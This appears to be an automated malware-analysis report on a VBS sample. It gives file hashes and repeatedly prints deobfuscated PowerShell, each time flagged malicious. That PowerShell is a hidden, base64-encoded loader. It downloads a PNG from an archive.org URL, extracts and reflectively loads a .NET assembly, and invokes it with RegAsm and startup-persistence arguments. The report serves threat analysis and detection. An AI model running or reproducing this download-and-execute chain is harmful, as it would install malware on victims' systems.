|
Hash | Hash Value |
|---|---|
| MD5 | 7e17f5ffe00366f01378f1878943d937
|
| Sha1 | ddb0f10b88bca46fc52be47d90aca81af82a7d86
|
| Sha256 | 5afc53c3e5dc88e9642bd8325295a0d7a72af1d96adbd41d58555b505ba14c3e
|
| Sha384 | c23632cf1d85c3da77ed22527002cf6f7905c2549391bb55e0152aad0b898ca7c76b018afd6a409e8b7d3a2bfa5f76b2
|
| Sha512 | 72e72d4e01d6a2eb3d5968ab324f87a8ecf4b023ba62e7a410b2d842d7b5c845733385fe369a355da7ac47edfac58cf428e8130a4a22fee16d169c87bebc6eaa
|
| SSDeep | 24576:WsjTV/0qRto7zWQW6J5RsjTV/0qRto7zWQW6J5YxsjTV/0qRto7zWQW6J5s:jBA7zuBA7zGEBA7zW
|
| TLSH | 8885E0CFBD0A66D86C4132B8691986D2F7DC92C86301E772EDB4C89572C08ADDD5B7C8
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
7e17f5ffe00366f01378f1878943d937 |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" Malicious |
7e17f5ffe00366f01378f1878943d937 > 7e17f5ffe00366f01378f1878943d937.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression" Malicious |
7e17f5ffe00366f01378f1878943d937 > 7e17f5ffe00366f01378f1878943d937.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
7e17f5ffe00366f01378f1878943d937 > 7e17f5ffe00366f01378f1878943d937.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
7e17f5ffe00366f01378f1878943d937 > 7e17f5ffe00366f01378f1878943d937.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
7e17f5ffe00366f01378f1878943d937 > 7e17f5ffe00366f01378f1878943d937.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
7e17f5ffe00366f01378f1878943d937 > 7e17f5ffe00366f01378f1878943d937.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
7e17f5ffe00366f01378f1878943d937 > 7e17f5ffe00366f01378f1878943d937.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |